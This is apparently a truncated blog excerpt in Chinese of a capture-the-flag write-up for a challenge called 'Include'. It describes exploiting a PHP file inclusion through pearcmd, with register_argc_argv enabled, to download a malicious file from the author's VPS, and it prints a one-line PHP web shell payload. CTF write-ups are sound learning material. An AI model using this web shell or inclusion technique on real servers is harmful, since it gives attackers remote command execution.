Indi
lazy_forever's Blog blog.lazyforever.top

解题 5/6 Include 🍐 打开容器,提示phpinfo 进入phpinfo.php查看php配置,发现register_argc_argv配置被打开,index.php内部有一个后缀名为.php的文件包含,通过pearcmd来包含进行恶意文件的下载,在vps上构造恶意文件 1 2 <?php echo '<?php system($_GET[0]);' ; 使用pearcmd包含: ?f…

讨论

还没有评论,来说第一句吧。

lazy_forever's Blog 的其他文章